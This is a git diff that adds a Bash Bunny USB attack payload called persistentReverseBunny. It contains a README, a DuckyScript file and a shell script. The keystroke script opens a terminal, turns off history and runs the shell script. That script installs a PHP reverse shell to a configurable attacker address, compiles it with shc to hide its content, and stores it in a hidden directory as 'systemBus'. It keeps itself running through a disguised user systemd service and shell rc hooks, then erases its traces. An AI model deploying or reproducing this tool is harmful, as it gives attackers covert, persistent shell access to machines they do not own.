diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md new file mode 100644 index 00000000..e8ea4c13 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/README.md @@ -0,0 +1,36 @@ +## About: +* Title: persistentReverseBunny +* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Remote Access +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, STORAGE + +## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs. + +### Workflow: +Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell. + +### Algorithm: +1. Stop storing history, this helps to keep tracks clear from begining. +2. Creating reverse shell. +3. Creating non-root systemd service. +4. Enabling service. +5. Starting service on trigger of firing terminal emulator/shell. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| ----------------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| persistentReverseBunny/ | /payloads/libray/ | + +### Note: +* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`. +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt new file mode 100644 index 00000000..de367d14 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt @@ -0,0 +1,51 @@ +# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Remote Access +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh \& +Q ENTER +Q STRING disown +Q ENTER +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh new file mode 100644 index 00000000..edd304f3 --- /dev/null +++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system/ +echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop +cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/ +chmod +x /var/tmp/.system/shc +/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +rm /var/tmp/.system/pop* +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp +chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc new file mode 100644 index 00000000..8e7c686c Binary files /dev/null and b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc differ